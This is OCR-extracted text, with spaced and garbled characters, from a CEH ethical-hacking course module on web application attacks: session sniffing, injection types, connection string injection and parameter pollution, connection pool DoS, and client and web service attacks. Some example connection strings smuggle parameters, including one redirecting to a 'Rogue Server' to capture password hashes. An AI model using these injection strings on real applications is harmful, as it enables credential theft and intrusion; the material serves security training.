S e s s i o n T o k e n S n i f f i n g
A tta cke rs firs t s n iff th e n e tw o rk tra ffic fo r valid session to ke n s and th e n p re d ic t th e n ext session
to k e n based on th e s n iffe d session to k e n . The a tta c k e r uses th e p re d icte d session ID to
a u th e n tic a te him o r h e rse lf w ith th e ta rg e t w eb a p p lica tio n . Thus, s n iffin g th e va lid session
to k e n is im p o rta n t in session m a n a g e m e n t attacks. A ttacke rs s n iff th e a p p lic a tio n tra ffic using a
s n iffin g to o l such as W ire sh a rk o r an in te rc e p tin g pro xy such as Burp. If HTTP co okies are being
used as th e tran sm issio n m echanism fo r session to ke n s and th e se cu rity flag is n o t set,
a tta ckers can rep la y th e cookie to gain u n a u th o rize d access to a p p lic a tio n . A tta cke rs can use
session cookies to p e rfo rm session hijacking, session replay, and m a n -in -th e -m id d le attacks.
W i r e s h a r k
Source: h ttp ://w w w .w ire s h a rk .o rg
W ire sh a rk is a n e tw o rk p ro to c o l analyzer. It lets you ca p tu re and in te ra c tiv e ly bro w se th e tra ffic
ru n n in g on a c o m p u te r n e tw o rk . It ca ptu re s live n e tw o rk tra ffic fro m E th e rn e t, IEEE 802.11,
PPP/HDLC, A T M , B lu e to o th , USB, T oken Ring, Fram e Relay, and FDDI n e tw o rk s . C aptured files
can be p ro g ra m m a tic a lly e d ite d via th e co m m an d line.

k3J T e s t ( W S ) . p c a p n g [ W i r e s h a r k 1 . 8 .2 ( S V N R e v 4 4 5 2 0 f r o m / t r u n k 1 . 8 ‫־‬ )]
£ ile E d it y ie w J jo C a p tu re A n a ly z e S ta tis tic s T e le p h o n y J o o ls In te rn a ls H e lp
st v a a m B ( 3 <3 . Q . <3 , □
F ilte r v E xpre ssion . .. C le a r A p p ly Save
N o . T im e S o u rc e D e s tin a tio n P ro to c o l L e n g th In fo
1 8 3 . 9 8 6 1 6 0 0 0 1 0 . 0 . 0 . 2 7 4 . 1 2 5 . 2 3 6 . 1 6 1 T C P 5 4 s e r v i c e - c t r l > h t t p s [ a c k ] s e q = 3 8 A c k = 3 8 w i i
1 9 5 . 1 5 6 3 4 3 0 0 f e 8 0 : : b 9 e a : d O l l : 3 e 0 f f 0 2 : : 1 : 2 D H C P v 6 1 5 0 S o l i c i t X I D : 0 x 5 a 8 2 d f C I D : 0 0 0 1 0 0 0 1 1 7 e 2 2 a a b ‫׳‬
2 0 5 . 6 9 5 6 6 9 0 0 1 0 . 0 . 0 . 2 7 4 . 1 2 5 . 1 3 5 . 1 2 5 T C P 9 1 [T C P s e g m e n t o f a r e a s s e m b l e d P D U ]
2 1 5 . 7 5 8 3 2 6 0 0 7 4 . 1 2 5 . 1 3 5 . 1 2 5 1 0 . 0 . 0 . 2 T C P 6 0 x m p p - c l i e n t > q w a v e [ a c k ] s e q - 1 A c k - 3 8 w i n —
2 2 5 . 9 9 9 6 3 3 0 0 f e 8 0 : : 5 d f 8 : C 2 d 8 : 5 b b f f 0 2 : : 1 : 2 D H C P V 6 1 5 0 S o l i c i t X I D : 0 x 8 3 e 0 4 9 C I D : 0 0 0 1 0 0 0 1 1 7 e 8 e l 4 e ‫׳‬
2 3 7 . 0 4 2 4 7 6 0 0 1 0 . 0 . 0 . 5 1 2 3 . 1 0 8 . 4 0 . 3 3 T C P 66 w e b m a i l - 2 > h t t p [ s y n ] s e q = 0 w i n = 8 1 9 2 L e n = 0
2 4 7 . 0 7 6 3 2 4 0 0 1 2 3 . 1 0 8 . 4 0 . 3 3 1 0 . 0 . 0 . 5 T C P 6 0 h t t p > w e b m a i l - 2 [ s y n , a c k ] s e q = 0 A c k = l w i n ‫־‬
2 5 7 . 0 7 6 6 9 1 0 0 1 0 . 0 . 0 . 5 1 2 3 . 1 0 8 . 4 0 . 3 3 T C P 6 0 w e b m a i l - 2 > h t t p [ a c k ] s e q = l A c k = l w i n = 6 4 2 4 !
2 6 7 . 0 7 6 9 0 0 0 0 1 0 . 0 . 0 . 5 1 2 3 . 1 0 8 . 4 0 . 3 3 H T T P 1 1 9 7 G E T / n e w m a i l / m a i l s i g n o u t . p h p H T T P / 1 . 1
2 7 7 . 1 3 0 4 2 7 0 0 1 2 3 . 1 0 8 . 4 0 . 3 3 1 0 . 0 . 0 . 5 T C P 6 0 h t t p > w e b m a i l - 2 [ a c k ] s e q ‫־‬ l A c k 1 1 4 4 ‫־‬ w i n = 8:
2 8 7 . 1 3 5 7 3 5 0 0 1 2 3 . 1 0 8 . 4 0 . 3 3 1 0 . 0 . 0 . 5 T C P 1 5 1 4 [ t c p s e g m e n t o f a r e a s s e m b l e d p d u ]
2 2 8 H T T P / 1 . 1 2 0 0 O K ( t e x t / h t m l )2 9 7 . 1 3 6 6 3 5 0 0 1 2 3 . 1 0 8 . 4 0 . 3 3
<1 III >
<1 HI
II>
0 0 6 0 3 a 3 2 3 2 3 a 3 3 3 4 20 4 7 4 d 5 4 O d O a 5 3 6 5 7 2 7 6 : 2 2 : 3 4 G M T . . S e r v
0 0 7 0 6 5 U 3 a 20 4 1 0‫׳‬ ‫׳‬ b l 6 3 68 b b O d O a 5 3 6 5 / 4 2 d e r : A p a c h e . . S e t -
0 0 8 0 4 3 6 t 6f 6 b 6 9 6 5 3 a 20 5 f 6 e 3 1 3 8 7 5 5 f 3 d 6 4 c o o k i e : n l 8 u = d -
0 0 9 0 6 5 6 c 6 5 7 4 6 5 6 4 3 b 20 6 5 7 8 7 0 6 9 7 2 6 5 7 3 3 d e l e t e d ; e x p i r e s -
O O aO 5 4 68 7 5 2C 20 3 2 3 2 2 d 5 3 6 5 7 0 2 d 3 2 3 0 3 1 3 1 T h u , 2 2 - s e p - 2 0 1 1
O O bO 20 3 1 3 0 3 a 3 2 3 2 3 a 3 3 3 3 20 4 7 4 d 5 4 3 b 20 7 0 1 0 : 2 2 : 3 3 G M T ; p
O O cO 6 1 7 4 68 3 d 2f 3 b 20 6 4 6f 6 d 6 1 6 9 6 e 3 d 2 e 6 9 a t h - / ; d o m a i n - . ‫ו‬
O O dO 6 e 2 e 6 3 6 1 6 d O d O a 4 5 7 8 7 0 6 9 7 2 6 5 7 3 3 a 20 n . c o m . . E x p i r e s :
O O eO 5 4 68 7 5 2 c 20 3 1 3 9 20 4 e 6 f 7 6 20 31 3 9 3 8 3 1 T h u , 1 9 N o v 1 9 8 1
O O fO 20 3 0 3 8 3 a 3 5 3 2 3 a 3 0 3 0 20 4 7 4 d 5 4 O d O a 4 3 0 8 : 5 2 : 0 0 G M T . .C
0 10 0 6 1 6 3 68 6 5 2 d 4 3 6 f 6 e 7 4 7 2 6f 6C 3 a 20 6 e 6f a c h e - c o n t r o l : n o
0 1 1 0 2 d 7 3 7 4 6f 7 2 6 5 2 c 20 6 e 6 f 2 d 6 3 6 1 6 3 68 6 5 - s t o r e , n o - c a c h e
0 12 0 2 c 20 6 d 7 5 7 3 7 4 2 d 7 2 6 5 7 6 6 1 6 c 6 9 6 4 6 1 7 4 , m u s t - r e v a l i d a t
0 1 3 0 6 5 2 c 20 7 0 6 f 7 3 7 4 2 d 6 3 68 6 5 6 3 6 b 3 d 3 0 2 c e , p o s t - c h e c k = 0 .
0 1 4 0 20 7 0 7 2 6 5 2 d 6 3 68 6 5 6 3 6 b 3 d 3 0 O d O a 5 0 7 2 p r e - c h e c k = 0 . . P r V
‫ז‬2• File: "E :C E H -T 00ls C E H v 8 M o d u le 08 S n iffe rs ' P ackets: 22 66 D is p la y e d : 22 66 M a rk e d : 0 L o a d tim e : 0:00.254 P ro file : D e fa u lt
F I G U R E 1 3 . 4 9 : W i r e s h a r k T o o l S c r e e n s h o t

EHWeb App Hacking Methodology C
Attack
Footprint Web Analyze Web Authorization Perform Attack
Infrastructure Applications Schemes Injection Attacks Web App Client
Attack
Web Services
Attack
Data Connectivity
Attack Session
Management
Mechanism
Attack
Authentication
Mechanism
Attack
Web Servers
l- H H In je ctio n attacks are ve ry co m m o n in w e b a pp lica tion s. There are m any typ es o f
in je c tio n attacks such as w eb scripts in je c tio n , OS co m m an ds in je c tio n , SMTP in je c tio n , SQL
in je c tio n , LDAP in je c tio n , and XPath in je c tio n . A p a rt fro m all these in je c tio n a tta cks, a
fre q u e n tly o ccu rrin g a tta ck is a SQL in je c tio n a ttack. In je ctio n fre q u e n tly takes place w he n th e
data th a t is given by th e user is se nt to th e in te rp re te r as a p a rt o f a co m m an d o r query. For
launching an in je c tio n a tta c k , th e a tta c k e r supplies th e c ra fte d data th a t tricks and m akes th e
in te rp re te r to execute th e com m ands o r q u e ry th a t are u n in te n d e d . Because o f th e in je c tio n
fla w s, th e a tta c k e r can easily read, create, u pd ate , and rem ove any o f th e a rb itra ry d a ta , i.e.,
available to th e a p p lica tio n . In som e cases, th e a tta c k e r can even bypass a d ee ply nested
fire w a ll e n v iro n m e n t and can ta ke c o m p le te c o n tro l o ver th e a p p lic a tio n and th e u n d e rlyin g
system . The d e ta il o f each in je c tio n a tta ck is given on th e fo llo w in g slides.

InjectionAttacks
‫נ‬
CEHUrt1fw4 ilhiul lUthM
J I n i n j e c t i o n a t t a c k s , a t t a c k e r s s u p p l y c r a f t e d m a l i c i o u s i n p u t t h a t i s s y n t a c t i c a l l y c o r r e c t a c c o r d i n g t o
t h e i n t e r p r e t e d l a n g u a g e b e i n g u s e d i n o r d e r t o b r e a k a p p l i c a t i o n ' s n o r m a l i n t e n d e d
S Q L I n j e c t i o n
E n t e r a s e r i e s o f m a l i c i o u s S Q L q u e r i e s
i n t o i n p u t f i e l d s t o d i r e c t l y m a n i p u l a t e
t h e d a t a b a s e
B
W e b S c rip ts In je c tio n
If user in put is used in to code th a t is dynamically
executed, enter crafted in put th a t breaks the
intended data context and executes com mands on
the server
D
L D A P I n j e c t i o n
T a k e a d v a n t a g e o f n o n - v a l i d a t e d w e b
a p p l i c a t i o n i n p u t v u l n e r a b i li t i e s t o p a s s L D A P
f i l t e r s t o o b t a i n d i r e c t a c c e s s t o d a t a b a s e s
‫ש‬‫ם‬
O S C o m m a n d s I n j e c t i o n
E x p l o i t o p e r a t i n g s y s t e m s b y e n t e r i n g
m a l i c io u s c o d e s in i n p u t f i e l d s i f a p p l i c a t i o n s
u t il i z e u s e r i n p u t in a s y s t e m - l e v e l c o m m a n d
B
X P a t h I n j e c t i o n
E n t e r m a l i c i o u s s t r i n g s in i n p u t f i e l d s in
o r d e r t o m a n i p u l a t e t h e X P a t h q u e r y s o
t h a t i t i n t e r f e r e s w i t h t h e a p p l i c a t i o n 's l o g i c
Ba
S M T P I n j e c t i o n
I n j e c t a r b i t r a r y S T M P c o m m a n d s i n t o
a p p l i c a t i o n a n d S M T P s e r v e r c o n v e r s a t i o n t o
g e n e r a t e la r g e v o l u m e s o f s p a m e m a il
B
N o t e : F o r c o m p l e t e c o v e r a g e o f S Q L I n j e c t i o n c o n c e p t s a n d t e c h n i q u e s r e f e r t o M o d u l e 1 4 : S Q L I n j e c t i o n
C o p y rig h t © b y EC-Gauactl.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
I
I n j e c t i o n A t t a c k s
In in je c tio n attacks, a tta ckers supply cra fte d m alicious in p u t th a t is syn ta ctica lly co rre ct
according to th e in te rp re te d language being used in o rd e r to break th e a p p lic a tio n 's n o rm a lly
in te n d e d in p u t.
Q W e b S cripts In je c tio n : If user in p u t is used in code th a t is d yn a m ica lly e xecuted, e n te r
c ra fte d in p u t th a t breaks th e in te n d e d data c o n te x t and executes com m ands on th e
server
Q OS C om m an ds In je c tio n : E xploit o p e ra tin g system s by e n te rin g m alicious code in in p u t
fie ld s if a p p lica tio n s u tilize user in p u t in a system -level co m m an d
© SMTP In je c tio n : In ject a rb itra ry SMTP co m m an ds in to a p p lic a tio n and SMTP server
co n ve rsa tio n to g en erate large vo lu m e s o f spam em ail
0 SQL In je c tio n : Enter a series o f m alicio u s SQL que rie s in to in p u t fie ld s to d ire c tly
m a n ip u la te th e database
© LDAP In je c tio n : Take advantage o f n o n -va lid a te d w e b a p p lica tio n in p u t v u ln e ra b ilitie s
to pass LDAP filte rs to o b ta in d ire c t access to databases
© XP ath In je c tio n : E nter m alicious strings in in p u t fie ld s in o rd e r to m a n ip u la te th e XPath
q u e ry so th a t it in te rfe re s w ith th e a p p lic a tio n 's logic

Note: For c o m p le te coverage o f SQL In je ctio n concepts and te chn iqu es, re fe r to M o d u le 14:
SQL In je ctio n A ttacks.

Attack Attack Attack Session Attack Attack
Web Servers Authentication Management Data Connectivity Web Services
Mechanism Mechanism
^ ^ “ ‫־‬J A tta ckin g th e data c o n n e c tiv ity a llo w s th e a tta c k e r to gain u n a u th o rize d c o n tro l o ver
th e in fo rm a tio n in th e database. The va riou s typ es o f d ata c o n n e c tiv ity a tta cks and th e ir
causes as w e ll as consequences are explained in d e ta il on th e fo llo w in g slides.

CEHA tta c k D a ta C o n n e c tiv ity
D a t a b a s e c o n n e c t i v i t y a t t a c k s e x p l o i t
t h e w a y a p p l i c a t i o n s c o n n e c t t o t h e
d a t a b a s e i n s t e a d o f a b u s i n g
d a t a b a s e q u e r i e s
D a t a C o n n e c t i v i t y A t t a c k s
S C o n n e c t i o n S t r i n g I n j e c t i o n
S C o n n e c t i o n S t r i n g P a r a m e t e r
P o l l u t i o n ( C S P P ) A t t a c k s
S C o n n e c t i o n P o o l D o S
J ‫־‬L
‫־‬ ‫ץ‬ r~
0 r r
0r r
0r r
0r r
< s = ©
0 T r
o
_ y v _
D a t a b a s e c o n n e c t i o n s t r i n g s a r e u s e d
t o c o n n e c t a p p l i c a t i o n s t o d a t a b a s e
e n g i n e s
"D ata S o urce = S e rve r,P o rt;
Network Library=DBMSSOCN;
I n i t i a l Catalog=DataBase;
User ID=Username;
Password=pwd;"
E x a m p l e o f a c o m m o n c o n n e c t i o n
s t r i n g u s e d t o c o n n e c t t o a M i c r o s o f t
S Q L S e r v e r d a t a b a s e
C o p y rig h t © b y EC-Gauactl.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
A t t a c k D a t a C o n n e c t i v i t y
^ A
A ttacke rs d ire c tly a tta ck data c o n n e c tiv ity so th a t th e y can access sensitive
in fo rm a tio n available in th e database. Database c o n n e c tiv ity attacks e x p lo it th e w ay
a p p lica tio n s co n n e ct to th e database instead o f a bu sin g d ata ba se q u e rie s.
Data Connectivity Attacks
© C on ne ction S tring In je ctio n
© C onnection S tring P a ram ete r P o llu tio n (CSPP) A ttacks
© C onnection Pool DoS
D atabase co n n e ctio n strings are used to co n n e ct a p p lica tio n s to d ata ba se engines:
"D a ta S o u r c e = S e rv e r ,P o rt; N e tw o rk Library=D BM SSO CN ; I n i t i a l C a ta lo g = D a ta B a s e ;
U s e r ID =U sernam e; P a ssw o rd = p w d ;"
Exam ple o f a co m m o n co n n e ctio n s trin g used to co n n e ct to a M ic ro s o ft SQL Server database

C o n n e c tio n S trin g In je c tio n CEH
I n a d e l e g a t e d a u t h e n t i c a t i o n e n v i r o n m e n t , t h e a t t a c k e r i n j e c t s p a r a m e t e r s i n a
c o n n e c t i o n s t r i n g b y a p p e n d i n g t h e m w i t h t h e s e m i c o l o n ( ; ) c h a r a c t e r
A c o n n e c t i o n s t r i n g i n j e c t i o n a t t a c k c a n o c c u r w h e n a d y n a m i c s t r i n g c o n c a t e n a t i o n
i s u s e d t o b u i l d c o n n e c t i o n s t r i n g s b a s e d o n u s e r i n p u t
B e f o r e I n j e c t i o n
"Data Source=Server,Port; Network Library=DBMSSOCN; I n itia l Catalog=DataBase;
User ID=Username; Password=pwd;"
A f t e r I n j e c t i o n
"Data Source=Server,Port; Network Library=DBMSSOCN; I n itia l Catalog=DataBase;
User ID=Username; Password=pwd; Encryption=off"
W h e n th e c o n n e c tio n s trin g is p o p u la te d , th e Encryption v a lu e w ill be a d d e d to th e p re v io u s ly c o n fig u re d s e t
o f p a ra m e te rs
C o n n e c t i o n S t r i n g I n j e c t i o n
■^ A co n n e ctio n strin g in je c tio n a tta ck can o ccur w h e n d yna m ic strin g c o n c a te n a tio n is
used to b uild co n n e ctio n strings th a t are based on user in p u t. If th e strin g is n o t v a lid a te d and
m alicio u s te x t o r ch aracters n o t escaped, an a tta c k e r can p o te n tia lly access sensitive data o r
o th e r resources on th e server. For exam ple, an a tta c k e r could m o u n t an a tta ck by supp lyin g a
se m icolo n and a p p en din g an a d d itio n a l value. The co n n e ctio n strin g is parsed by using a "la st
one w in s " a lg o rith m , and th e h o stile in p u t is s u b s titu te d fo r a le g itim a te value.
The co n n e ctio n strin g b u ild e r classes are designed to e lim in a te guessw ork and p ro te c t against
syntax e rro rs and se cu rity vu ln e ra b ilitie s . They p ro vid e m e th o d s and p ro p e rtie s co rre sp o n d in g
to th e kn ow n ke y/va lu e pairs p e rm itte d by each data p ro vid e r. Each class m a in ta in s a fixed
c o lle c tio n o f syn o n ym s and can tra n s la te fro m a synonym to th e co rre sp o n d in g w e ll-k n o w n key
nam e. Checks are p e rfo rm e d fo r valid ke y/va lu e pairs and an invalid p air th ro w s an e xcep tion .
In a d d itio n , in je cte d values are handled in a safe m anner.
B e fo re in je c tio n
The C om m on c o n n e ctio n string gets co nn ecte d to th e M ic ro s o ft SQL Server database as show n
as fo llo w s :

" D at a S o u r c e = S e r v e r ,P o r t ; N e t w o r k L i b r a r y = D B M S S O C N ; I n i t i a l C a t a l o g = D a t a B a s e ;
U s e r I D = U s e r n a m e ; P a s s w o r d = p w d ; ‫״‬
F I G U R E 1 3 . 5 0 : B e f o r e i n j e c t i o n
A fte r in je c tio n
The a tta ckers can easily in je c t p a ra m e te rs ju s t by jo in in g a se m icolo n (;) ch a ra cte r using
c o n n e ctio n s trin g in je c tio n te ch n iq u e s in a d eleg ated a u th e n tic a tio n e n v iro n m e n t.
In th e fo llo w in g exam ple, th e user is asked to give a user nam e and passw ord fo r cre a tin g a
c o n n e ctio n string. Here th e a tta c k e r e n te rs th e passw ord as "p w d ; E n c ry p tio n = o ff"; it m eans
th a t th e a tta c k e r has vo id ed th e e n c ry p tio n system . The re su ltin g co n n e ctio n strin g becom es:
"Data Source=Server,P o rt; Network Library=DBMSSOCN; I n i t i a l Catalog=DataBase;
User ID=Username; Password=pwd; E n c ry p tio n = o ff"
F I G U R E 1 3 . 5 1 : A f t e r i n j e c t i o n
W hen th e c o n n e ctio n s trin g is p o p u la te d , th e e n c ry p tio n value w ill be added to th e p re vio u sly
co n fig u re d set o f p aram eters.

Connection String Parameter r CII
Pollution (CSPP) Attacks <.!!1E !1
Attacker tries to connect to the
database by using the Web
Application System account
instead o f a user-provided set of
credentials
D a ta s o u r c e ‫־־‬ S Q L 2 0 0 5 ; i n i t i a l
c a t a lo g ‫״‬ d b l / i n t e g r a t e d
s e c r u r it y ‫״‬ n o ; u s e r i d ‫״‬ ;D a ta
S o u rc e —T a r g e t S e r v e r , T a r g e t
P o r t ; P a s s w o rd ■ ; I n t e g r a t e d
S e c u r i t y ‫״‬ t r u e ;
D a ta s o u r c e ‫״‬ S Q L 2 0 0 5 ; i n i t i a l
c a t a lo g ‫״‬ d b l ; i n t e g r a t e d
s e c u r i t y ‫״‬ n o ; u s e r i d ‫״‬ ; D a ta
S o u rc e ‫״‬ T a r g e t S e r v e r , T a r g e t
P o r t ■4 4 3 ; P as s w o rd ‫״‬ ;
I n t e g r a t e d S e c u r i t y ‫״‬ t r u e ;
D a ta s o u r c e - S Q L 2 0 0 5 ;
i n i t i a l c a t a l o g ‫״‬ d b l ;
in t e g r a t e d s e c u r i t y ‫״‬ n o ; u s e r
i d ‫״‬ ; D a ta S o u r c e ‫״‬ R ogue
S e r v e r ; P a s s w o rd ‫״‬ ;
I n t e g r a t e d S e c u r i t y ‫״‬ t r u e ;
Attacker w ill then sniff W indows
credentials (password hashes) when
th e application tries to connect to
Rogue_Server w ith the W indows
credentials it's running on
C o n n e c t i o n S t r i n g P a r a m e t e r P o l l u t i o n ( C S P P )
A t t a c k s
C on ne ction strin g p a ra m e te r p o llu tio n (CSPP) is used by a tta ckers to steal user IDs and to hijack
w e b cred en tials. CSPP e xp lo its sp e cifically th e se m icolo n d e lim ite d database co n n e ctio n strings
th a t are c o n stru cte d d yn a m ica lly based on th e user in p u ts fro m w e b a p p lic a tio n s . In CSPP
attacks, a tta ckers o v e rw rite p a ra m e te r values in th e co n n e ctio n string .
H a s h S t e a l i n g
. An a tta c k e r replaces th e value o f data source p a ra m e te r w ith th a t o f a Rogue
M ic ro s o ft SQL S erver co nn ecte d to th e In te rn e t ru n n in g a sn iffe r:
d b l; in t e g r a t e d s e c u r ity = n o ; u s e r
In te g r a te d S e c u r it y = t r u e ;
D ata s o u rc e = SQL2005; i n i t i a l c a ta lo g
ID = ;D a ta S ource=R ogue S e rv e r; Password=
A ttacke rs w ill th e n s n iff W in d o w s cre d e n tia ls (passw ord hashes) w h e n th e a p p lica tio n trie s to
co n n e ct to R ogue_S erver w ith th e W in d o w s cre d e n tia ls it's ru n n in g on.
P o r t S c a n n i n g
‫ב‬ A tta c k e r trie s to co n n e ct to d iffe re n t p o rts by changing th e value and seeing th e e rro r
m essages o b ta in e d .

D ata s o u rc e = SQL2005; i n i t i a l c a ta lo g = d b l; in t e g r a t e d s e c u r ity = n o ; u s e r
ID = ;D a ta S o u rc e = T a rg e t S e rv e r, T a rg e t P o rt= 4 4 3 ; P a ssw ord= ; In te g r a te d
S e c u r ity = t r u e ;
H i j a c k i n g W e b C r e d e n t i a l s
A tta c k e r trie s to co n n e ct to th e database by using th e W eb A p p lic a tio n System
a cco u n t instead o f a u se r-p ro vid e d set o f cred en tials.
D ata s o u rc e = SQL2005; i n i t i a l c a ta lo g = d b l; in t e g r a t e d s e c u r ity = n o ; u s e r
ID = ;D a ta S o u rc e = T a rg e t S e rv e r, T a rg e t P o r t; P a ssw ord= ; In te g r a te d
S e c u r it y = t r u e ;

ConnectionPoolDoS CEHC«rt1fW4 ItliK4I Km Im(
&
A t t a c k e r e x a m i n e s t h e c o n n e c t i o n p o o l i n g s e t t i n g s o f t h e a p p l i c a t i o n ,
c o n s t r u c t s a l a r g e m a l i c i o u s S Q L q u e r y , a n d r u n s m u l t i p l e q u e r i e s
s i m u l t a n e o u s l y t o c o n s u m e a l l c o n n e c t i o n s i n t h e c o n n e c t i o n p o o l , c a u s i n g
d a t a b a s e q u e r i e s t o f a i l f o r l e g i t i m a t e u s e r s
Example:
B y d e f a u l t i n A S P . N E T , t h e m a x i m u m a l l o w e d c o n n e c t i o n s i n t h e p o o l is
1 0 0 a n d t i m e o u t is 3 0 s e c o n d s
T h u s , a n a t t a c k e r c a n r u n 1 0 0 m u l t i p l e q u e r i e s w i t h 3 0 + s e c o n d s
e x e c u t i o n t i m e w i t h i n 3 0 s e c o n d s t o c a u s e a c o n n e c t i o n p o o l D o S s u c h
t h a t n o o n e e l s e w o u l d b e a b l e t o u s e t h e d a t a b a s e - r e l a t e d p a r t s o f t h e
a p p l i c a t i o n
C o n n e c t i o n P o o l D o S
* The a tta c k e r exam ines th e co n n e ctio n p o o lin g se tting s o f th e a p p lic a tio n , co n stru cts a
large m alicious SQL query, and runs m u ltip le que rie s s im u lta n e o u sly to consum e all co nn ectio ns
in th e c o n n e ctio n pool, causing database que rie s to fa il fo r le g itim a te users.
E xam ple:
By d e fa u lt, in ASP.NET, th e m axim um a llo w e d co n n e ctio n s in th e pool is 100 and tim e o u t is 30
seconds.
Thus, an a tta c k e r can run 100 m u ltip le q u e rie s w ith 30+ seconds e xecu tion tim e w ith in 30
seconds to cause a co n n e ctio n pool DoS such th a t no one else w o u ld be able to use th e
database re la te d parts o f th e a p p lica tio n .

Web App Hacking Methodology CEH
(•rtifWd itfciul lUilwt
Attack
Footprint Web Analyze Web Authorization Perform Attack
Infrastructure Applications Schemes Injection Attacks Web App Client
A t t a c k W e b A p p C l i e n t
A ttacks p e rfo rm e d on a se rve r-sid e a p p lica tio n in fe c t th e clie n t-sid e a p p lica tio n w h e n th e
clie n t-sid e a p p lica tio n in te ra cts w ith th ese m alicious server o r process m alicious data. The
a tta ck on th e c lie n t side occurs w he n th e c lie n t establishes a co n n e ctio n w ith th e server. If
th e re is no c o n n e ctio n b e tw e e n c lie n t and server, th e n th e re is no risk. This is because no
m alicio u s data is passed by th e server to th e clie n t. C onsider an exam ple o f a clie n t-sid e a tta ck
w h e re an in fe cte d w e b page ta rg e ts a sp ecific b ro w s e r w ea kne ss and e xp lo its it successfully. As
a resu lt, th e m alicio u s server gains u n a u th o rize d c o n tro l o ver th e c lie n t system .

AttackWebAppClient
J A t t a c k e r s i n t e r a c t w i t h t h e s e r v e r - s i d e a p p l i c a t i o n s i n u n e x p e c t e d w a y s i n o r d e r t o p e r f o r m m a l i c i o u s
a c t i o n s a g a i n s t t h e e n d u s e r s a n d a c c e s s u n a u t h o r i z e d d a t a
A t t a c k W e b A p p C l i e n t
A ttacke rs in te ra c t w ith th e server-side a p p lica tio n s in une xpe cte d w ays in o rd e r to
p e rfo rm m alicious actions against th e end users and access u n a u th o riz e d d a ta . A tta cke rs use
va riou s m e th o d s to p e rfo rm th e m a lic io u s a tta cks.
The fo llo w in g are th e m alicio u s attacks p e rfo rm e d by a tta ckers to co m p ro m ise clie n t-sid e w e b
a pp lica tion s:
© Cross-Site S cripting
© R edirection A ttacks
© HTTP H eader In je ctio n
© Fram e In je ctio n
© R equest Forgery A ttacks
© Session Fixation
© Privacy A ttacks
© A ctiveX A ttacks
C o p y r ig h t © b y EC-Council. A ll R ig h ts R e s e rv e d R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
Redirection
Attacks
ActiveX
Attacks
Session
Fixation
Frame
Injection
HTTP Header
Injection
Cross-Site
Scripting
Privacy
Attacks
Request
Forgery Attack

An a tta c k e r bypasses th e clien ts ID's s e cu rity m echanism and gains th e access
privileges, and th e n inje cts th e m alicious scripts in to th e w e b pages o f a p a rtic u la r
w e b site . These m alicious scripts can even re w rite th e HTM L c o n te n t o f th e w eb site.
R e d i r e c t i o n A t t a c k s
I f) / l A ttacke rs d eve lo p codes and links in such a w ay th a t th e y resem ble th e m ain site th a t
th e user w a n ts to visit; h o w e ve r, w h e n a user w a n ts to v is it th e respective site, th e user
is re d ire c te d to th e m alicious w e b s ite w h e re th e re is a p o ssib ility fo r th e a tta c k e r to o b ta in th e
user's cre d e n tia ls and o th e r sensitive in fo rm a tio n .
t H T T P H e a d e r I n j e c t i o n
An a tta c k e r splits th e HTTP response in to m u ltip le responses by in je c tin g a m alicious
response in HTTP headers. This a tta ck can deface w eb sites, poison th e cache, and trig g e r cross-
site scripting.
F r a m e I n j e c t i o n
W h e n scripts d o n 't v a lid a te th e ir in p u t, codes are in je cte d by th e a tta c k e r th ro u g h
fram e s. This a ffe cts all th e bro w se rs and scripts w hich d o e s n 't v a lid a te u n tru s te d in p u t. These
v u ln e ra b ilitie s o ccur in H TM L page w ith fra m e s. A n o th e r reason fo r th is v u ln e ra b ility is e d itin g
o f th e fra m e s is s u p p o rte d by th e w e b brow sers.
R e q u e s t F o r g e r y A t t a c k
£ In th is a tta ck, th e a tta c k e r e xp lo its th e tru s t o f w e b site o r w e b a p p lica tio n on th e
user's b ro w se r. The a tta ck w orks by in clu d in g a lin k in a page th a t accesses a site to w h ich th e
user is a u th e n tic a te d .
S e s s i o n F i x a t i o n
Session fix a tio n helps an a tta c k e r to hijack a valid user session. In th is a tta ck, th e
a tta c k e r a u th e n tic a te s him o r h e rse lf w ith a kn ow n session ID and th e n hijacks th e user-
va lid a te d session by th e kn o w le d g e o f th e used session ID. In a session fix a tio n a tta ck, th e
a tta c k e r tricks th e user to access a g en uine w e b server using an existin g session ID va lu e.
P r i v a c y A t t a c k s
A p rivacy a tta ck is tra ckin g p e rfo rm e d w ith th e help o f a re m o te site th a t is based on a
leaked p e rsiste n t b ro w se r state.
A A c t i v e X A t t a c k s
The a tta c k e r lures th e v ic tim via em ail o r a link th a t has been c ra fte d in such a w ay
th a t th e loo ph ole s o f re m o te e xecu tion code becom e accessible. A ttacke rs gain equal
access privileges to th a t o f an a u th o rize d user.

Mechanism
Attack Attack
Mechanism
A t t a c k W e b S e r v i c e s
W eb services are easily ta rg e te d by th e a tta cke r. Serious se cu rity breaches are caused w he n an
a tta c k e r co m p ro m ise s th e w eb services. The d iffe re n t typ es o f w e b service a tta cks and th e ir
consequences are explained on th e fo llo w in g slides.

CEHAttackWebServices
J W e b s e r v i c e s w o r k a t o p t h e l e g a c y w e b a p p l i c a t i o n s , a n d a n y a t t a c k o n w e b s e r v i c e w i l l i m m e d i a t e l y
e x p o s e a n u n d e r l y i n g a p p l i c a t i o n ' s b u s i n e s s a n d l o g i c v u l n e r a b i l i t i e s f o r v a r i o u s a t t a c k s
D a t a b a s e A t t a c k s ,
D o S A t t a c k s
Inform ation Leakage,
Application Logic Attacks
r j f A t t a c k W e b S e r v i c e s
Cl W e b services w o rk a to p th e legacy w e b a p p lica tio n s, and any a tta ck on a w e b service
w ill im m e d ia te ly expose an u n d e rlyin g a p p lic a tio n 's business and log ic v u ln e ra b ilitie s fo r
va riou s attacks. W eb services can be a tta cked using m any te ch n iq u e s as th e y are m ade
available to users th ro u g h va riou s m echanism s. Hence, th e p o ssib ility o f v u ln e ra b ilitie s
increases. The a tta c k e r can e x p lo it th ose v u ln e ra b ilitie s to co m p ro m ise th e w e b services. There
m ay be m any reasons b ehind a tta ckin g w e b services. A cco rding to th e purpose, th e a tta c k e r
can choose th e a tta ck to co m p ro m ise w e b services. If th e a tta cke r's in te n tio n is to stop a w eb
service fro m serving in te n d e d users, th e n the a tta c k e r can launch a d e n ia l-o f-se rvice a tta ck by
sending n u m e ro u s req ue sts.
V arious typ es o f attacks used to a tta ck w e b services are:
© SOAP In je ctio n
© XM L In je ctio n
© WSDL P robing A ttacks
